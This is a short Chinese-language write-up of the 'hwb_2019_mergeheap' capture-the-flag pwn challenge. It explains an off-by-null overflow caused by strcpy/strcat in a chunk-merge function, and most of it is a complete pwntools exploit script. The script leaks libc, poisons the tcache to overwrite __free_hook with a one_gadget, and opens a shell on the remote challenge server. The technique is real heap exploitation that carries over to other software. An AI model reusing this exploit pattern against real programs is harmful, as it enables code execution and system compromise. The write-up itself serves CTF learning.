hwb_2019_mergeheap(str系列的特性)
例行检查我就不放了
漏洞点在merge这个函数
可以看到他将俩chunk进行拼接,并且把chunk的内容复制到新的chunk里面了
但是strcpy和strcat都有着一个特性就是遇到\x00就会停止,
假设我们将0x30和0x38的chunk合并,因为\x00给我们覆盖了所以他就会把下一个chunk的size给覆盖 造成改写chunk的大小,如果改写的chunk大小包含被释放掉的chunk,我们就可以去修改fd指针造成任意写去获得shell
完整exp如下:
from pwn import * #p = process('./mergeheap') p = remote('node4.buuoj.cn',26286) elf = ELF('./mergeheap') libc = ELF('./libc-2.27.so') def launch_gdb(): context.terminal = ['xfce4-terminal','-x','sh','-c'] gdb.attach(proc.pidof(p)[0]) def ls(index): p.sendlineafter('>>',str(index)) def add(size,content): ls(1) p.sendlineafter('len:',str(size)) p.sendafter('content:',content) def show(index): ls(2) p.sendlineafter('idx:',str(index)) def free(index): ls(3) p.sendlineafter('idx:',str(index)) def merge(idx1,idx2): ls(4) p.sendlineafter('idx1:',str(idx1)) p.sendlineafter('idx2:',str(idx2)) #launch_gdb() for i in range (8): add(0x80,'aaaa\n') for i in range (1,8): free(i) free(0) add(8,'aaaaaaaa') show(0) p.recvuntil('a'*8) libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-0x3ebd20 print('libc_base--->'+hex(libc_base)) free_hook = libc_base + libc.sym['__free_hook'] print('free_hook--->'+hex(free_hook)) one = [0x4f2c5,0x4f322,0x10a38c] one_gadget = libc_base + one[1] add(0x60,'aaaa\n')#1 add(0x30,'a'*0x30)#2 add(0x38,'a'*0x38)#3 add(0x100,'c\n')#4 add(0x68,'d\n')#5 add(0x20,'c\n')#6 add(0x20,'e\n')#7 add(0x20,'f\n')#8 add(0x20,'g\n')#9 free(5) free(7) free(8) merge(2,3) free(6) payload = b'a'*0x28+p64(0x31)+p64(free_hook)+p64(0)+b'\n' add(0x100,payload) add(0x20,'aaaa\n') add(0x20,'aaaa\n') add(0x20,p64(one_gadget)+b'\n') free(9) p.interactive()
结束!!!